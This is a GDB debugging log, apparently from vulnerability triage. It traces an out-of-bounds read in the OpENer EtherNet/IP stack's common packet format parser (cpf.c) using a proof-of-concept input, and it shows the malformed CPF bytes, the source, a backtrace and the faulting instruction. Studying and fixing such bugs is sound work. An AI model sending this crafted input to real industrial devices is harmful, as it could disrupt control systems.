=== Break on target function ===
Breakpoint 1 at 0x2f214a: file /root/OpENer/source/src/enet_encap/cpf.c, line 239.
=== Run with PoC ===

Breakpoint 1, CreateCommonPacketFormatStructure (data=0x50e92e <incomplete sequence \350>, data_length=16, common_packet_format_data=<optimized out>) at /root/OpENer/source/src/enet_encap/cpf.c:239
239	  common_packet_format_data->address_info_item[0].type_id = 0;
=> 0x00000000002f214a <CreateCommonPacketFormatStructure+10>:	66 c7 05 9d 6f 21 00 00 00	movw   $0x0,0x216f9d(%rip)        # 0x5090f0 <g_common_packet_format_data_item+32>
=== Function entry ===
#0  CreateCommonPacketFormatStructure (data=0x50e92e <incomplete sequence \350>, data_length=16, common_packet_format_data=<optimized out>) at /root/OpENer/source/src/enet_encap/cpf.c:239
239	  common_packet_format_data->address_info_item[0].type_id = 0;
=> 0x00000000002f214a <CreateCommonPacketFormatStructure+10>:	66 c7 05 9d 6f 21 00 00 00	movw   $0x0,0x216f9d(%rip)        # 0x5090f0 <g_common_packet_format_data_item+32>
data = 0x50e92e <incomplete sequence \350>
data_length = 16
common_packet_format_data = <optimized out>
length_count = <optimized out>
item_count = <optimized out>
cpf_start = 0x50e92e
cpf_len   = 16
cpf_end   = 0x50e93e
cpf_end - cpf_start = 16
=== CPF bytes ===
0x50e92e:	0x01	0xe8	0x00	0x00	0x00	0x00	0xb2	0x00
0x50e936:	0x06	0x00	0x04	0x02	0x20	0x01	0x24	0x01
0x50e92e:	0x01	0xe8	0x00	0x00	0x00	0x00	0xb2	0x00
0x50e936:	0x06	0x00	0x04	0x02	0x20	0x01	0x24	0x01
0x50e93e:	0x00	0x80	0x40	0x3b	0x04	0x00	0xb8	0xff
=== Source region ===
239	  common_packet_format_data->address_info_item[0].type_id = 0;
240	  common_packet_format_data->address_info_item[1].type_id = 0;
241	
242	  size_t length_count = 0;
243	  CipUint item_count = GetUintFromMessage(&data);
244	  //OPENER_ASSERT(4U >= item_count);/* Sanitizing data - probably needs to be changed for productive code */
245	  common_packet_format_data->item_count = item_count;
246	  length_count += 2;
247	  if(common_packet_format_data->item_count >= 1U) {
248	    common_packet_format_data->address_item.type_id = GetUintFromMessage(&data);
249	    common_packet_format_data->address_item.length = GetUintFromMessage(&data);
250	    length_count += 4;
251	    if(common_packet_format_data->address_item.length >= 4) {
252	      common_packet_format_data->address_item.data.connection_identifier =
253	        GetUdintFromMessage(&data);
254	      length_count += 4;
255	    }
256	    if(common_packet_format_data->address_item.length == 8) {
257	      common_packet_format_data->address_item.data.sequence_number =
258	        GetUdintFromMessage(&data);
259	      length_count += 4;
260	    }
261	  }
262	  if(common_packet_format_data->item_count >= 2) {
263	    common_packet_format_data->data_item.type_id = GetUintFromMessage(&data);
264	    common_packet_format_data->data_item.length = GetUintFromMessage(&data);
265	    common_packet_format_data->data_item.data = (EipUint8 *) data;
266	    if(data_length >=
267	       length_count + 4 + common_packet_format_data->data_item.length) {
268	      data += common_packet_format_data->data_item.length;
269	      length_count += (4 + common_packet_format_data->data_item.length);
270	    } else {
271	      return kEipStatusError;
272	    }
273	
274	    /* Data type per CIP Volume 2, Edition 1.4, Table 2-6.1. */
275	    CipUint address_item_count = (CipUint)(common_packet_format_data->item_count - 2U);
276	
277	    for(size_t j = 0; j < (address_item_count > 2 ? 2 : address_item_count);
278	        j++)                                                                      /* TODO there needs to be a limit check here???*/
279	    {
280	      common_packet_format_data->address_info_item[j].type_id =
281	        GetIntFromMessage(&data);
282	      OPENER_TRACE_INFO("Sockaddr type id: %x\n",
283	                        common_packet_format_data->address_info_item[j].type_id);
284	      length_count += 2;
285	      if( (common_packet_format_data->address_info_item[j].type_id ==
286	           kCipItemIdSocketAddressInfoOriginatorToTarget)
287	          || (common_packet_format_data->address_info_item[j].type_id ==
288	              kCipItemIdSocketAddressInfoTargetToOriginator) ) {
289	        common_packet_format_data->address_info_item[j].length =
290	          GetIntFromMessage(&data);
291	        common_packet_format_data->address_info_item[j].sin_family =
292	          GetIntFromMessage(&data);
293	        common_packet_format_data->address_info_item[j].sin_port =
294	          GetIntFromMessage(&data);
295	        common_packet_format_data->address_info_item[j].sin_addr =
296	          GetUdintFromMessage(&data);
297	        for(size_t i = 0; i < 8; i++) {
298	          common_packet_format_data->address_info_item[j].nasin_zero[i] = *data;
299	          data++;
300	        }
301	        length_count += 18;
=== Step over item_count read ===
240	  common_packet_format_data->address_info_item[1].type_id = 0;
=> 0x00000000002f2153 <CreateCommonPacketFormatStructure+19>:	66 c7 05 a8 6f 21 00 00 00	movw   $0x0,0x216fa8(%rip)        # 0x509104 <g_common_packet_format_data_item+52>
$1 = <optimized out>
$2 = <optimized out>
$3 = 0x50e92e
$4 = 0
=== Set read watchpoint on first byte past CPF slice ===
Hardware read watchpoint 2: *$cpf_end
=== Continue until first out-of-bounds read ===

Hardware read watchpoint 2: *$cpf_end

Value = 0 '\000'
CreateCommonPacketFormatStructure (data=0x50e93e "", data_length=16, common_packet_format_data=<optimized out>) at /root/OpENer/source/src/enet_encap/cpf.c:280
280	      common_packet_format_data->address_info_item[j].type_id =
=> 0x00000000002f2368 <CreateCommonPacketFormatStructure+552>:	66 45 89 5a ed     	mov    %r11w,-0x13(%r10)
=== OOB evidence ===
#0  CreateCommonPacketFormatStructure (data=0x50e93e "", data_length=16, common_packet_format_data=<optimized out>) at /root/OpENer/source/src/enet_encap/cpf.c:280
#1  0x00000000002f30f6 in NotifyCommonPacketFormat (received_data=0x7fffffffd838, originator_address=0x7fffffffdb18, outgoing_message=0x7fffffffdb50) at /root/OpENer/source/src/enet_encap/cpf.c:46
#2  HandleReceivedSendRequestResponseDataCommand (receive_data=0x7fffffffd838, originator_address=0x7fffffffdb18, outgoing_message=0x7fffffffdb50) at /root/OpENer/source/src/enet_encap/encap.c:558
#3  HandleReceivedExplictTcpData (socket=1, buffer=<optimized out>, length=<optimized out>, number_of_remaining_bytes=<optimized out>, originator_address=0x7fffffffdb18, outgoing_message=0x7fffffffdb50) at /root/OpENer/source/src/enet_encap/encap.c:186
#4  0x00000000002df7bd in main () at /root/OpENer/source/src/utils/enipmessage.c:12
#0  CreateCommonPacketFormatStructure (data=0x50e93e "", data_length=16, common_packet_format_data=<optimized out>) at /root/OpENer/source/src/enet_encap/cpf.c:280
280	      common_packet_format_data->address_info_item[j].type_id =
=> 0x00000000002f2368 <CreateCommonPacketFormatStructure+552>:	66 45 89 5a ed     	mov    %r11w,-0x13(%r10)
data = 0x50e93e ""
data_length = 16
common_packet_format_data = <optimized out>
j = <optimized out>
address_item_count = <optimized out>
length_count = 16
item_count = 59393
$5 = 0xe801
$6 = 0x50e93e
$7 = 16
data == cpf_end ? 1
=== Source at OOB site ===
274	    /* Data type per CIP Volume 2, Edition 1.4, Table 2-6.1. */
275	    CipUint address_item_count = (CipUint)(common_packet_format_data->item_count - 2U);
276	
277	    for(size_t j = 0; j < (address_item_count > 2 ? 2 : address_item_count);
278	        j++)                                                                      /* TODO there needs to be a limit check here???*/
279	    {
280	      common_packet_format_data->address_info_item[j].type_id =
281	        GetIntFromMessage(&data);
282	      OPENER_TRACE_INFO("Sockaddr type id: %x\n",
283	                        common_packet_format_data->address_info_item[j].type_id);
284	      length_count += 2;
285	      if( (common_packet_format_data->address_info_item[j].type_id ==
286	           kCipItemIdSocketAddressInfoOriginatorToTarget)
287	          || (common_packet_format_data->address_info_item[j].type_id ==
288	              kCipItemIdSocketAddressInfoTargetToOriginator) ) {
289	        common_packet_format_data->address_info_item[j].length =
290	          GetIntFromMessage(&data);
291	        common_packet_format_data->address_info_item[j].sin_family =
292	          GetIntFromMessage(&data);
293	        common_packet_format_data->address_info_item[j].sin_port =
294	          GetIntFromMessage(&data);
295	        common_packet_format_data->address_info_item[j].sin_addr =
296	          GetUdintFromMessage(&data);
297	        for(size_t i = 0; i < 8; i++) {
298	          common_packet_format_data->address_info_item[j].nasin_zero[i] = *data;
299	          data++;
300	        }
301	        length_count += 18;
=== Nearby instructions ===
Dump of assembler code from 0x2f2358 to 0x2f2378:
280	      common_packet_format_data->address_info_item[j].type_id =
=> 0x00000000002f2368 <CreateCommonPacketFormatStructure+552>:	mov    %r11w,-0x13(%r10)

281	        GetIntFromMessage(&data);
282	      OPENER_TRACE_INFO("Sockaddr type id: %x\n",
283	                        common_packet_format_data->address_info_item[j].type_id);
284	      length_count += 2;
285	      if( (common_packet_format_data->address_info_item[j].type_id ==
286	           kCipItemIdSocketAddressInfoOriginatorToTarget)
287	          || (common_packet_format_data->address_info_item[j].type_id ==
   0x00000000002f236d <CreateCommonPacketFormatStructure+557>:	cmp    $0xffff8001,%r11d
   0x00000000002f2374 <CreateCommonPacketFormatStructure+564>:	jle    0x2f23c0 <CreateCommonPacketFormatStructure+640>
   0x00000000002f2376 <CreateCommonPacketFormatStructure+566>:	cs nopw 0x0(%rax,%rax,1)

End of assembler dump.
=== Stop logging ===
